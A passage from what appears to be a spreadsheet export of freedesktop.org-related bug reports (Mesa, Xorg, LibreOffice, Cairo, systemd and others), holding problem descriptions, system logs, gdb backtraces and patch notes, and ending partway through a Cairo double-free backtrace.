$ sudo vim /etc/systemd/system/packagekit.service  # add --verbose
$ sudo systemctl daemon-reload 
$ systemctl cat packagekit.service 
# /etc/systemd/system/packagekit.service
[Unit]
Description=PackageKit Daemon
[Service]
Type=dbus
BusName=org.freedesktop.PackageKit
User=root
ExecStart=/usr/libexec/packagekitd --verbose
$ pgrep -fl packagekit
$ sudo systemctl start packagekit.service
Job for packagekit.service failed. See systemctl status packagekit.service and journalctl -xe for details.
$ systemctl status packagekit.service 
â— packagekit.service - PackageKit Daemon
   Loaded: loaded (/etc/systemd/system/packagekit.service static)
   Active: failed (Result: timeout) since Sat 2015-04-04 09:41:27 CEST 2min 8s ago
  Process: 28148 ExecStart=/usr/libexec/packagekitd --verbose (code=killed signal=TERM)
 Main PID: 28148 (code=killed signal=TERM)
Apr 04 09:39:57 medusa packagekitd[28148]: 09:39:57        PackageKit        Verbose debugging enabled (on console 0)
Apr 04 09:39:57 medusa PackageKit[28148]: daemon start
Apr 04 09:41:27 medusa systemd[1]: packagekit.service start operation timed out. Terminating.
Apr 04 09:41:27 medusa systemd[1]: Failed to start PackageKit Daemon.
Apr 04 09:41:27 medusa systemd[1]: Unit packagekit.service entered failed state.
Apr 04 09:41:27 medusa systemd[1]: packagekit.service failed.
If I don't include --verbose on the ExecStart line everything works correctly.
Is this a bug or intention? Can you help me run with --verbose by default?</t>
  </si>
  <si>
    <t>MESA-97169</t>
  </si>
  <si>
    <t>xmgrace graphical issues with Intel gen4</t>
  </si>
  <si>
    <t>downstream bug:
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=832794
After installing xmgrace and running it with modesetting on Intel gen4 gpu..
..a blank plot is shown by default. The background should be white but
instead a matrix of equally-spaced black dots is displayed on the
background.
Select Plot appearance... from the Plot menu and change the Color
in the Page background section. For instance choose Orange as
Page background Color and check Fill.
Click on the Accept button.
The background should become uniformly orange. Instead the background
stays transparent (white with the regular black dot grid).
xorg-server 1.18.4
mesa 12.0.1</t>
  </si>
  <si>
    <t>XORG-16369</t>
  </si>
  <si>
    <t>Trivial memory leak in XOpenDisplay (with xcb)</t>
  </si>
  <si>
    <t>Created attachment 17133
Fixes the trivial memory leak in XOpenDisplay (with xcb)
Every unsuccessful call to XOpenDisplay (with xcb) leaks 43 bytes on my machine because _XConnectXCB allocates memory for 'fullname' but it does not get released in this case.</t>
  </si>
  <si>
    <t>whydoubt</t>
  </si>
  <si>
    <t>MESA-17718</t>
  </si>
  <si>
    <t>Mesa 7.3-devel implementation error: Invalid light state in fetch_state</t>
  </si>
  <si>
    <t>I've tried to set up a gem-enabled setup.
libdrm dri2proto mesa and xf86-video-intel are from git rest normal release versions.
glxgears says:
Mesa 7.3-devel implementation error: Invalid light state in fetch_state
Please report at bugzilla.freedesktop.org
My card:
00:02.0 VGA compatible controller: Intel Corporation Mobile GM965/GL960 Integrated Graphics Controller (rev 0c)</t>
  </si>
  <si>
    <t>MESA-93566</t>
  </si>
  <si>
    <t>Shadow of Mordor is fading to white with Intel Mesa driver</t>
  </si>
  <si>
    <t>Hello devs
today I was testing Shadow of Mordor on my Intel Iris pro since tessellation landed for gen7+ some days ago in master git.
Mesa:
glxinfo | grep OpenGL
OpenGL vendor string: Intel Open Source Technology Center
OpenGL renderer string: Mesa DRI Intel(R) Haswell Desktop 
OpenGL core profile version string: 3.3 (Core Profile) Mesa 11.2.0-devel (git-28dea26)
OpenGL core profile shading language version string: 3.30
OpenGL core profile context flags: (none)
OpenGL core profile profile mask: core profile
OpenGL core profile extensions:
OpenGL version string: 3.0 Mesa 11.2.0-devel (git-28dea26)
OpenGL shading language version string: 1.30
OpenGL context flags: (none)
OpenGL extensions:
OpenGL ES profile version string: OpenGL ES 3.0 Mesa 11.2.0-devel (git-28dea26)
OpenGL ES profile shading language version string: OpenGL ES GLSL ES 3.00
OpenGL ES profile extensions:
Steam start options:
MESA_GL_VERSION_OVERRIDE=4.3 MESA_GLSL_VERSION_OVERRIDE=430 %command%
When the main menu comes up the complete rendered background (not menu dialogs) is fading slowly to white (also ingame and benchmark).
If i append MESA_EXTENSION_OVERRIDE=-GL_ARB_compute_shader to my steam start option there is no fading &gt; the menu is rendered as expected.
I have made an apitrace and replayed it...
Without GL_ARB_compute_shader there are errors because Shadow of Mordor wants to use it but rendering LOOKS ok.
With GL_ARB_compute_shader the errors are gone but there is this white fading.
So I guess there is something wrong with GL_ARB_compute_shader!
Could someone look into this?
You can download my apitrace here...
http://www.goodbytez.de/mesa/ShadowOfMordor.trace.tar.bz2
Kind regards
Darius</t>
  </si>
  <si>
    <t>XORG-28249</t>
  </si>
  <si>
    <t>Driver/ark</t>
  </si>
  <si>
    <t>Hercules Stingray 64 (ark2000pv) does not work: AddScreen/ScreenInit failed for driver 0</t>
  </si>
  <si>
    <t>Created attachment 35852
PATCH: Don't assume that FB address registers are initialized properly
ark driver does not work with Hercules Stingray 64 card (ark2000pv). X fails to start with:
[...]
(II) ark(0): vgaHWGetIOBase: hwp-&gt;IOBase is 0x03d0 hwp-&gt;PIOOffset is 0x0000
(II) ark(0): Creating default Display subsection in Screen section
        Default Screen Section for depth/fbbpp 24/32
(==) ark(0): Depth 24 (--) framebuffer bpp 32
(==) ark(0): RGB weight 888
(==) ark(0): Default visual is TrueColor
(**) ark(0): Chipset: ark2000pv
(--) ark(0): Framebuffer @ 0xe5e50000
(==) ark(0): Using gamma correction (1.0 1.0 1.0)
(--) ark(0): Detected 2048 bytes video ram
[...]
Fatal server error:
AddScreen/ScreenInit failed for driver 0
Comparing with lspci the framebuffer address is wrong:
00:0f.0 VGA compatible controller: ARK Logic Inc 2000PV [Stingray] (prog-if 00 [VGA controller])
        Flags: medium devsel
        Memory at e5000000 (32-bit prefetchable) [size=4M]
        [virtual] Expansion ROM at 1c000000 [disabled] [size=64K]
Attached patch fixes this problem.</t>
  </si>
  <si>
    <t>DRI-89453</t>
  </si>
  <si>
    <t>4k MST monitor doesn't come back from xset dpms force off: failed link training</t>
  </si>
  <si>
    <t>Created attachment 114057
The log from running git bisect between 3.16 and 3.17
I have a DisplayPort MST monitor that I have attached to my Mac Book Pro 2014 via a mini DisplayPort to DisplayPort cable.  Since 3.16 my monitor doesn't come back from sleep mode (this can be triggered by xset dpms force off).  Specifically I:
* xset dpms force off
* Wait for the monitor to say it's going to sleep and turn the backlight off
* Push a button on my keyboard
* The monitor wakes back up and turns the backlight on
* After a few seconds the monitor goes back into sleep mode no image is ever displayed.
During this time my second monitor (a USB DisplayLink monitor) continues to work fine.  Rebooting fixes the problem but running xrandr --output DP2 --off xrandr --output DP2 --preferred doesn't help unplugging and re-plugging the cable doesn't help and killing X doesn't help.
I ran a git bisect which indicates that 0e32b39ceed665bfa4a77a4bc307b6652b991632 is the problem but it's too big of a commit for me to understand sorry.  Attached is the git bisect log.  I'll be attaching some other logs but I'm afraid they're not very useful...
This in still broken on both 3.19 and 99aedde0869ce194539166ac5a4d2e1a20995348 (master from this morning).  4.0-rc2 has other problems the display doesn't come up at all.</t>
  </si>
  <si>
    <t>palmer</t>
  </si>
  <si>
    <t>XORG-34794</t>
  </si>
  <si>
    <t>xf86-input-mouse 1.6.99 broken on BSD systems</t>
  </si>
  <si>
    <t>Until xf86-input-mouse-1.6.0 the MousePreInit() function exited if an 
os specific PreInit function existed. It let the os-specific function finish all initialisations that remained to be done after osInfo-&gt;PreInit() was called. 
The code in master now continues and does things that the bsdMousePreInit() function in bsd_mouse.c doesn't expect.
I don't have time to look at this deeper for now but please don't release xf86-input-mouse 1.7 before this is fixed.</t>
  </si>
  <si>
    <t>LIBREOFFICE-54642</t>
  </si>
  <si>
    <t>FILEOPEN: wrong layout in .doc generated by crystal reports</t>
  </si>
  <si>
    <t>Created attachment 66795
doc that is screwed up
Problem description: 
The lay-out of the document is screwed up. The text should be in the tables.
Steps to reproduce:
Open the document in Libreoffice
Current behavior:
Expected behavior:
Platform (if different from the browser): 
Libreoffice different versions linux and windows</t>
  </si>
  <si>
    <t>tom.adriaensen</t>
  </si>
  <si>
    <t>MESA-38896</t>
  </si>
  <si>
    <t>[softpipe] glxinfo hangs</t>
  </si>
  <si>
    <t>mesa: b11566260778bb35f4f6e9dc9bc3470ee99b3557 (master)
glxinfo with softpipe hangs and never completes
$ make linux-x86-debug
$ LD_LIBRARY_PATH=lib/gallium glxinfo
name of display: :0.0</t>
  </si>
  <si>
    <t>thellstrom</t>
  </si>
  <si>
    <t>UDISKS-41669</t>
  </si>
  <si>
    <t>[configuration enhancement] adapt configure to specify location of completion file</t>
  </si>
  <si>
    <t>Created attachment 52206
Patch to add option to configure and rename completion file
Hello
I suggest to adapt configuration part of udisks to allow user/package maintainer to specify location of completion file and also suggest to name it without `-bash-completion.sh' part (because the purpose of the file should be obvious from the file location and it is look weird if full path is `/etc/bash_completion.d/udisks*-bash-completion.sh').
P.S. I took and adapt some code from `source-highlight'.</t>
  </si>
  <si>
    <t>lomov.vl</t>
  </si>
  <si>
    <t>MESA-101009</t>
  </si>
  <si>
    <t>[TRACKER] Mesa 17.1 release tracker</t>
  </si>
  <si>
    <t>CAIRO-4612</t>
  </si>
  <si>
    <t>Text not being drawn if first character entirely out of surface</t>
  </si>
  <si>
    <t>With the win32 backend if a string is drawn using the toy font api
(cairo_show_text) with the first character entirely off the surface (ex: current
point negative x with an identity matrix) the entire string disappears.</t>
  </si>
  <si>
    <t>DRI-92998</t>
  </si>
  <si>
    <t>gpu hang after resume on ivybridge  and dmesg errors</t>
  </si>
  <si>
    <t>Created attachment 119914
dmesg after boot
Hi
After boot i have a *ERROR* mismatch in has_drrs in dmesg (at 2.40) .
After suspend/resume the gpu hang for 20 seconds with
[  109.349028] [drm] stuck on render ring
[  109.349397] [drm] GPU HANG: ecode 7:0:0x85fffff8 in kwin [1667] reason: Ring hung action: reset
The hang only happen with the new 4.4-rc1 kernel never with the 4.3 stable
but even with the 4.3 kernel there is the *ERROR* mismatch in has_drrs in dmesg.
The gpu crash dump dmesg after boot and after suspend/resume are attached for the 4.4-rc1 kernel.
lspci | grep VGA 
00:02.0 VGA compatible controller: Intel Corporation 3rd Gen Core processor Graphics Controller (rev 09)
glxinfo | grep OpenGL :
OpenGL vendor string: Intel Open Source Technology Center
OpenGL renderer string: Mesa DRI Intel(R) Ivybridge Mobile 
OpenGL core profile version string: 3.3 (Core Profile) Mesa 11.1.0-devel (git-e06238c 2015-11-08 trusty-oibaf-ppa)
OpenGL core profile shading language version string: 3.30
OpenGL core profile context flags: (none)
OpenGL core profile profile mask: core profile
OpenGL core profile extensions:
OpenGL version string: 3.0 Mesa 11.1.0-devel (git-e06238c 2015-11-08 trusty-oibaf-ppa)
OpenGL shading language version string: 1.30
OpenGL context flags: (none)
OpenGL extensions:
OpenGL ES profile version string: OpenGL ES 3.0 Mesa 11.1.0-devel (git-e06238c 2015-11-08 trusty-oibaf-ppa)
I use Kubuntu 14.04 Trusty.</t>
  </si>
  <si>
    <t>tasev.stefanoska</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-16256</t>
  </si>
  <si>
    <t>GPG key addition request</t>
  </si>
  <si>
    <t>Since my DSA key is no longer accepted here's a new RSA pubkey for my account.  Thanks.</t>
  </si>
  <si>
    <t>LIBREOFFICE-72155</t>
  </si>
  <si>
    <t>Calc no more doesn't update links automaticaly</t>
  </si>
  <si>
    <t>Created attachment 89996
Screenshot showing sheet opened with 4.0.6
I have two spreadsheets. One references (links) cells from the other one for calculations. The option automatically update links in LO prefs are set.
In all LO versions up to 4.0.6 it works fine with no problems. The values from the source spreadsheet appear in destination spreadsheet. Calcs are done as expected.
Rising with the 4.1.x (tried all up to 4.1.3.2) now do not update the links automatically anymore. The referencing cells contain only #REF and calculation/formulars fail. Doing a manual update via Edit-&gt;Links...-&gt;Update works and all values are reread from the source spreadsheet.
Opening the same spreadsheet(s) with LO versions 3.x and up to 4.0.6 work correctly the values are linked and updated as expected.
Maybe it is of concern: both spreadsheets are password protected. On loading the password for both spreadsheets are prompted (and entered correctly).
Attach two screenshots. One shows the spreadsheet opened with 4.0.6. The other the same spreadsheet with 4.1.3.2.</t>
  </si>
  <si>
    <t>Rudolf.Kollien</t>
  </si>
  <si>
    <t>FONTCONFIG-95481</t>
  </si>
  <si>
    <t>Build fails on Android due to broken lconv struct</t>
  </si>
  <si>
    <t>This breaks FcStrtod. I'd suggest one of two solutions:
1. Remove the locale check and rely on the fontconfig-provided strtod implementation in all cases rather than using the libc one only if the decimal_point is .. This seems preferable in general as it prevents behavior from potentially differing based on locale.
2. Add a configure check for a working lconv struct containing a decimal_point field and #ifdef out the check if it's not present. This maintains current behavior on locales where the decimal point is . but adds complexity and any case where it causes problems would cause the same problems in other locales anyway.</t>
  </si>
  <si>
    <t>rodger.combs</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-74749</t>
  </si>
  <si>
    <t>Subscribing to ModemManager-devel impossible</t>
  </si>
  <si>
    <t>Hey
Users cannot subscribe to the ModemManager-devel mailing list since at least one week ago. They get the following error:
Bug in Mailman version 2.1.13
We're sorry we hit a bug!
Please inform the webmaster for this site of this problem. Printing of traceback and other system information has been explicitly inhibited but the webmaster can find this information in the Mailman error logs. 
Can someone take a look at this issue?</t>
  </si>
  <si>
    <t>GSTREAMER_SDK-51076</t>
  </si>
  <si>
    <t>mpeg2dec: Alignment problem causes crashed on Win64 and potentially others</t>
  </si>
  <si>
    <t>In 64-bit Windows 7 with 64-bit SDK 2012.5
C:\fl\ads&gt;gst-launch-0.10 playbin2 uri=file:///fl/ads/Romeo_och_Julia_movie.mpg
Setting pipeline to PAUSED ...
Pipeline is PREROLLING ...
Hangs and reports gst-launch-0.10.exe has stopped working
whereas under 64-bit Ubuntu Linux 12.04 the same file (checked with md5sum attached) with the same gst-launch playbin2 ... plays OK (gst-launch and playbin2 version 0.10.36)
Either gst-launch or playbin2 Windows ports are defective.</t>
  </si>
  <si>
    <t>sergei.vorobyov</t>
  </si>
  <si>
    <t>XORG-2261</t>
  </si>
  <si>
    <t>man page update for C&amp;T driver</t>
  </si>
  <si>
    <t>Explain the FpMode option. Several people seem to need it.</t>
  </si>
  <si>
    <t>XORG-26543</t>
  </si>
  <si>
    <t>Mouse trapped on first screen using Xinerama - Regression from synaptics-fix-xinerama.patch</t>
  </si>
  <si>
    <t>The problem as described and solved in http://bugs.gentoo.org/206614 (see also http://cgit.freedesktop.org/xorg/driver/xf86-input-synaptics/commit/?h=gentoo-patches&amp;id=8efccb0a76833b31a8d0273b49dd584246a97c7d) was apparently reintroduced in the commit of http://cgit.freedesktop.org/xorg/driver/xf86-input-synaptics/commit/?id=c405a69f83dab77cfe6c76f718a3ca5614a85918 thus leading to a regression carried through all the way to the present version 1.2.1. 
The problem seems to be that using the priv-&gt;minx and priv-&gt;miny values instead of the default -1 in the call to xf86InitValuatorAxisStruct prevents the synaptic mouse pointer from crossing over to the second screen. If the mouse pointer is moved to the second screen e.g. using an external mouse it works normally on the other screen also with the synaptics pad but gets trapped again as soon as one crosses back to the first screen. This is extremely annoying for anybody who uses an external monitor with his laptop and wants to make use of the extra desktop. 
The fix is trivial simply remove the usage of priv-&gt;minx and priv-&gt;miny and pass the default values to xf86InitValuatorAxisStruct as suggested in the Gentoo patch above. I have patched my synaptics driver V1.1.3 in this way and it works just fine now but perhaps you want to review the problem more thoroughly and find a solution that takes the automatically set priv-&gt;minx and priv-&gt;miny values into account without breaking the driver as it does at the moment.</t>
  </si>
  <si>
    <t>manfred.kitzbichler</t>
  </si>
  <si>
    <t>SYSTEMD-90689</t>
  </si>
  <si>
    <t>[PATCH] Add support for alienware gfx amplifier</t>
  </si>
  <si>
    <t>Created attachment 116105
patch adding these keycodes
Some Alienware notebooks and desktops support an external graphics
housing called the Alienware Graphics Amplifier. It allows the usage
of a larger or more modern graphics card than your gaming PC would
already support.  In order to provide a good experience systems that
support it can provide notification to the OS via the scancodes on the
the keyboard controller of events related to the cable.
The following 4 events are supported (and the presumed OS response):
* Cable plugged in (An app on the existing display or terminal would
tell the user to reboot the system to activate)
* Undock cable pressed (An app would let the user know to reboot the
system to complete undock process also when supported by GFX driver
driver can clean up and work without a reboot)
* Surprise removal of cable (System reboots).
For the cable plug events I've mapped over to prog1/prog2.  If there is a better option for these please adjust accordingly.
The surprise removal of the cable causes the GPU drivers to get in a very bad state.  X continues to run  but plugging the cable back in or restarting X to use a different GPU doesn't fix it.
You can't tell the user to save their game status or anything else useful so it makes most sense to reboot or shutdown the machine.
I'm submitting a separate patch for the system reboot directly to the kernel via an i8042 filter.  In the event this is running on a kernel without that patch sending KEY_POWER is the next best thing as it would shutdown if the system DE was configured to do this.</t>
  </si>
  <si>
    <t>mario_limonciello</t>
  </si>
  <si>
    <t>UDISKS-44737</t>
  </si>
  <si>
    <t>Created attachment 55511
add a systemd service
udisks should install a systemd service file and add a SystemdService= line to
its dbus-activated service.
By doing that it will be started by systemd instead of dbus.
This has the advantage that it will be treated like any other system daemon and
put in its own cgroup by systemd. Also its state can be checked and it can
easily be restarted or stopped if it might misbehave.
On systems without systemd dbus will start the daemon itself just like it
does now.
Attached is a patch that implements this behaviour.
Like most other packages that support systemd it adds a
--with-systemdsystemunitdir switch to configure.
Installation of the systemd service file can also be disabled using this
configure switch.
Please note that I could not test this patch yet as I don't have a new enough glib availiable to compile the current master branch.
But I prepared nearly identical patches for PolicyKit upower and colord so it should work fine.</t>
  </si>
  <si>
    <t>XORG-46079</t>
  </si>
  <si>
    <t>X.org crash in intel_uxa_pixmap_put_image when rotating a large image in eog</t>
  </si>
  <si>
    <t>Forwarding this bug from Ubuntu reporter Gatan Jarnot:
http://bugs.launchpad.net/ubuntu/+source/xserver-xorg-video-intel/+bug/889068
[Problem]
When rotating a large image (e.g. 16M) the X server crashes with the stacktrace shown below.
It appears something's trying to copy a pixmap to an invalid address.
[Original Description]
When I turn left or right an image system logs out and I have to log again on my count
(gdb) backtrace full
#0  __memcpy_ssse3_rep () at ../sysdeps/i386/i686/multiarch/memcpy-ssse3-rep.S:191
No locals.
#1  0xb739788c in intel_uxa_pixmap_put_image (pixmap= src=0x9c6e420  
    src_pitch=32000 x=0 y=0 w=8000 h=8) at /usr/include/i386-linux-gnu/bits/string3.h:52
        dst = 0xa41ee000 
        row_length = 32000
        num_rows = 8
        priv = 0x9ba3298
        stride = 32256
        cpp = 
        ret = 0
#2  0xb739968c in intel_uxa_put_image (pixmap=0x9ba3250 x=0 y=0 w=8000 h=8 src=0x9c6e420  
    src_pitch=32000) at ../../src/intel_uxa.c:769
        priv = 0x9ba3298
#3  0xb73b0553 in uxa_do_put_image (src_stride=32000 bits=0x9c6e420  format=2 h=8 w=8000 y=0 
    x=0 pGC=0x9c399d0 pDrawable=0x9ba3250 depth=) at ../../uxa/uxa-accel.c:164
        y1 = 0
        x2 = 159692224
        ok = 
        x1 = 
        y2 = 
        src = 0x9c6e420 
        yoff = 0
        uxa_screen = 0x0
        pPix = 0x9ba3250
        pClip = 
        pbox = 0x9c1c590
        nbox = 
        xoff = 0
        bpp = 
#4  uxa_put_image (pDrawable=0x9ba3250 pGC=0x9c399d0 depth=24 x=0 y=0 w=8000 h=8 leftPad=0 
    format=2 bits=0x9c6e420 ) at ../../uxa/uxa-accel.c:202
No locals.
From dmesg:
[ 41787.607] (EE) intel(0): Couldn't create pixmap for fbcon
...
[ 52602.993] (EE) intel(0): Couldn't create pixmap for fbcon
...
[ 88171.985] (EE) intel(0): Couldn't create pixmap for fbcon
...
[ 88172.435] (WW) intel(0): I830DRI2GetMSC:1297 get vblank counter failed: Invalid argument
[ 88172.438] (WW) intel(0): I830DRI2ScheduleWaitMSC:1364 get vblank counter failed: Invalid argument
[ 88172.440] (WW) intel(0): I830DRI2GetMSC:1297 get vblank counter failed: Invalid argument
[ 88172.440] (WW) intel(0): first get vblank counter failed: Invalid argument
[ 88172.903] (WW) intel(0): I830DRI2GetMSC:1297 get vblank counter failed: Invalid argument
[ 88172.905] (WW) intel(0): I830DRI2ScheduleWaitMSC:1364 get vblank counter failed: Invalid argument
[ 88172.959] (WW) intel(0): I830DRI2GetMSC:1297 get vblank counter failed: Invalid argument
[ 88172.970] (WW) intel(0): I830DRI2ScheduleWaitMSC:1364 get vblank counter failed: Invalid argument
[ 88173.143] (WW) intel(0): I830DRI2GetMSC:1297 get vblank counter failed: Invalid argument
[ 88173.177] (WW) intel(0): I830DRI2ScheduleWaitMSC:1364 get vblank counter failed: Invalid argument
[ 88173.363] (WW) intel(0): I830DRI2ScheduleWaitMSC:1364 get vblank counter failed: Invalid argument
[ 88174.698] (WW) intel(0): first get vblank counter failed: Invalid argument
[ 88175.457] (WW) intel(0): first get vblank counter failed: Invalid argument
[100285.751] (WW) intel(0): first get vblank counter failed: Invalid argument
[100314.429]
Backtrace:
[100314.770] 0: /usr/bin/X (xorg_backtrace+0x37) [0x80a66f7]
[100314.770] 1: /usr/bin/X (0x8048000+0x62b3a) [0x80aab3a]
[100314.770] 2: (vdso) (__kernel_rt_sigreturn+0x0) [0x1c340c]
[100314.770] 3: /lib/i386-linux-gnu/libc.so.6 (0x276000+0x117771) [0x38d771]
[100314.770] 4: /usr/lib/xorg/modules/drivers/intel_drv.so (0x52a000+0xe85c) [0x53885c]
[100314.770] 5: /usr/lib/xorg/modules/drivers/intel_drv.so (0x52a000+0x1066c) [0x53a66c]
[100314.770] 6: /usr/lib/xorg/modules/drivers/intel_drv.so (0x52a000+0x27873) [0x551873]
[100314.770] 7: /usr/bin/X (0x8048000+0xe643a) [0x812e43a]
[100314.771] 8: /usr/bin/X (0x8048000+0x26997) [0x806e997]
[100314.771] 9: /usr/bin/X (0x8048000+0x2a117) [0x8072117]
[100314.771] 10: /usr/bin/X (0x8048000+0x1c70c) [0x806470c]
[100314.771] 11: /lib/i386-linux-gnu/libc.so.6 (__libc_start_main+0xf3) [0x28f113]
[100314.771] 12: /usr/bin/X (0x8048000+0x1ca21) [0x8064a21]
[100314.771] Bus error at address 0xa38ba008
[100314.800]
Caught signal 7 (Bus error). Server aborting
DistroRelease: Ubuntu 11.10
Package: eog 3.2.1-0ubuntu1
ProcVersionSignature: Ubuntu 3.0.0-12.20-generic 3.0.4
Uname: Linux 3.0.0-12-generic i686
NonfreeKernelModules: wl
ApportVersion: 1.23-0ubuntu4
Architecture: i386
Date: Fri Nov 11 12:42:15 2011
ExecutablePath: /usr/bin/eog
InstallationMedia: Ubuntu 11.10 Oneiric - Build i386 LIVE Binary 20111013-11:02
ProcEnviron:
PATH=(custom no user)
LANG=fr_FR.UTF-8SourcePackage: eog
UpgradeStatus: Upgraded to oneiric on 2011-11-05 (6 days ago)</t>
  </si>
  <si>
    <t>TELEPATHY-13623</t>
  </si>
  <si>
    <t>TextChannel should not send messages with the same id more than once</t>
  </si>
  <si>
    <t>currently: (in telepathy-python/telepathy/server/channel.py:269)
    @dbus.service.signal(CHANNEL_TYPE_TEXT signature='uuuuus')
    def Received(self id timestamp sender type flags text):
        self._pending_messages[id] = (timestamp sender type flags text)
This will always emit a signal
I suggest either:
creating a standard wrapper (so that users don't have to):
    def received(self id timestamp sender type flags text):
        Wrapper around broken Received signal
        if id not in self._pending_messages:
            self.Received(id timestamp sender type flags text)
or raising ValueError to stop the signal being transmitted:
    @dbus.service.signal(CHANNEL_TYPE_TEXT signature='uuuuus')
    def Received(self id timestamp sender type flags text):
        if id in self._pending_messages:
            raise ValueError(You can't receive the same message twice.)
        else:
            self._pending_messages[id] = (timestamp sender type flags text)</t>
  </si>
  <si>
    <t>alsuren</t>
  </si>
  <si>
    <t>LIBREOFFICE-78949</t>
  </si>
  <si>
    <t>FILEOPEN: terminating with unexpected exception of type com::sun::star::xml::sax::SAXParseException</t>
  </si>
  <si>
    <t>Created attachment 99392
backtrace from the send to apple window
Problem description: LibreOffice crashes when I try to open a certain .xlsx file.
Note: Unfortunately I won't be able to share the file as it contains sensitive information. I have not created the file myself but I can open it in e.g. LibreOffice on Linux just fine. Without any modification done I can save the same file as .xlsx again and transfer the file to the MacOS machine but then the file open just fine. I suspect the file was created by some MS Office installation and something in that file makes LibreOffice crash.
Steps to reproduce:
1. open file.x
2. LibreOffice crashes
3. The Send to Apple report window opens
Current behavior:
LibreOffice crashes
Expected behavior:
LibreOffice should not crash :-)
Operating System: Mac OS X
Version: 4.2.4.2 release</t>
  </si>
  <si>
    <t>HAL-9702</t>
  </si>
  <si>
    <t>backlight support for macbooks</t>
  </si>
  <si>
    <t>here's the code.
i'd email the mailing list but this conference has no smtp server :)</t>
  </si>
  <si>
    <t>XORG-34478</t>
  </si>
  <si>
    <t>no option for setting mouse speed</t>
  </si>
  <si>
    <t>evdev only supports mouse acceleration but the workaround for setting mouse speed by xset (xset m 2 0) is not allowed when either:
Option AccelerationProfile -1
Option AccelerationScheme none
are enabled.
further the parameter which is supposed to control mouse speed with profile -1:
Option ConstantDeceleration
does not allow to use negative numbers to increase speed (without xset).</t>
  </si>
  <si>
    <t>jhopper</t>
  </si>
  <si>
    <t>MESA-73835</t>
  </si>
  <si>
    <t>[HD4400 intel] Corrupt display slow animations</t>
  </si>
  <si>
    <t>Created attachment 92457
X server log
Hi
My Intel 4400 HD card is not working correctly. It displays some artifacts when rendering certain animations and other animations are sometimes slow to display and not very smoothly (mostly WM animations such as fades).
The computer is an Intel x86_64 laptop with integrated HD4400 graphics card (System76 model daru4). OS is debian unstable
More info below.
Software versions:
X server: 7.7
X driver: 2.99.906
Mesa: 9.2.2
libdrm: 2.4.50
lspci says:
00:02.0 VGA compatible controller: Intel Corporation Haswell-ULT Integrated Graphics Controller (rev 09) (prog-if 00 [VGA controller])
	Subsystem: CLEVO/KAPOK Computer Device 8400
	Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+
	Status: Cap+ 66MHz- UDF- FastB2B+ ParErr- DEVSEL=fast &gt;TAbort- SERR- &lt;PERR- INTx-
	Latency: 0
	Interrupt: pin A routed to IRQ 61
	Region 0: Memory at f7800000 (64-bit non-prefetchable) [size=4M]
	Region 2: Memory at e0000000 (64-bit prefetchable) [size=256M]
	Region 4: I/O ports at f000 [size=64]
	Expansion ROM at  [disabled]
	Capabilities: 
	Kernel driver in use: i915
No xorg.conf
I can't get intel_reg_dumper output:
% sudo intel_reg_dumper                       
Couldn't map MMIO region: Resource temporarily unavailable</t>
  </si>
  <si>
    <t>CAIRO-102922</t>
  </si>
  <si>
    <t>evince abrt on a double free in cairo_truetype_font_destroy</t>
  </si>
  <si>
    <t>Using cairo 1.14.10 on Ubuntu evince sibabrt when printing a document (which I got from the submitter but don't share here since it includes private info)
Backtrace
#0  0x00007f8d67db80bb in __GI_raise (sig=sig@entry=6)
    at ../sysdeps/unix/sysv/linux/raise.c:51
#1  0x00007f8d67db9f5d in __GI_abort () at abort.c:90
#2  0x00007f8d67e0229d in __libc_message (action=action@entry=
    do_abort fmt=fmt@entry=0x7f8d67f29408 *** Error in `%s': %s: 0x%s ***\n)
    at ../sysdeps/posix/libc_fatal.c:181
#3  0x00007f8d67e0965a in malloc_printerr (action= str=0x7f8d67f29740 double free or corruption (!prev) ptr= ar_ptr=) at malloc.c:5423
#4  0x00007f8d67e0b74e in _int_free (av=0x7f8d6815bc20  p= have_lock=0) at malloc.c:4172
#5  0x00007f8d67e1040e in __GI___libc_free (mem=)
    at malloc.c:3142
#6  0x00007f8d6928621c in cairo_truetype_font_destroy (font=font@entry=0x556abc58ce30) at ../../../../src/cairo-truetype-subset.c:292
#7  0x00007f8d692881df in cairo_truetype_subset_init_internal (truetype_subset=truetype_subset@entry=0x7ffe160e3490 font_subset=font_subset@entry=0x7ffe160e3600 is_pdf=is_pdf@entry=1) at ../../../../src/cairo-truetype-subset.c:1226
#8  0x00007f8d69288b4a in _cairo_truetype_subset_init_pdf (truetype_subset=truetype_subset@entry=0x7ffe160e3490 font_subset=font_subset@entry=0x7ffe160e3600)
    at ../../../../src/cairo-truetype-subset.c:1242
#9  0x00007f8d692c637b in _cairo_pdf_surface_emit_truetype_font_subset (font_subset=0x7ffe160e3600 surface=0x556abcd1f5c0)
    at ../../../../src/cairo-pdf-surface.c:5436
#10 0x00007f8d692c637b in _cairo_pdf_surface_emit_unscaled_font_subset (font_subset=0x7ffe160e3600 closure=0x556abcd1f5c0)
    at ../../../../src/cairo-pdf-surface.c:5910
#11 0x00007f8d69284ce1 in _cairo_sub_font_collect (closure=0x7ffe160e35b0 entry=0x556abcb6d150) at ../../../../src/cairo-scaled-font-subsets.c:746
#12 0x00007f8d69284ce1 in _cairo_scaled_font_subsets_foreach_internal (font_subsets= font_subset_callback=font_subset_callback@entry=0x7f8d692c6290  closure=closure@entry=0x556abcd1f5c0 type=type@entry=CAIRO_SUBSETS_FOREACH_UNSCALED)
    at ../../../../src/cairo-scaled-font-subsets.c:1067
#13 0x00007f8d69285c77 in _cairo_scaled_font_subsets_foreach_unscaled (font_subsets= font_subset_callback=font_subset_callback@entry=0x7f8d692c6290  closure=closure@entry=0x556abcd1f5c0) at ../../../../src/cairo-scaled-font-subsets.c:1095
#14 0x00007f8d692c20d8 in _cairo_pdf_surface_emit_font_subsets (surface=0x556abcd1f5c0) at ../../../../src/cairo-pdf-surface.c:5956
#15 0x00007f8d692c20d8 in _cairo_pdf_surface_finish (abstract_surface=0x556abcd1f5c0) at ../../../../src/cairo-pdf-surface.c:2031
#16 0x00007f8d69268ec6 in _cairo_surface_finish (surface=0x556abcd1f5c0)
    at ../../../../src/cairo-surface.c:1033
#17 0x00007f8d69269ad7 in INT_cairo_surface_finish (surface=0x556abcd1f5c0)
    at ../../../../src/cairo-surface.c:1080
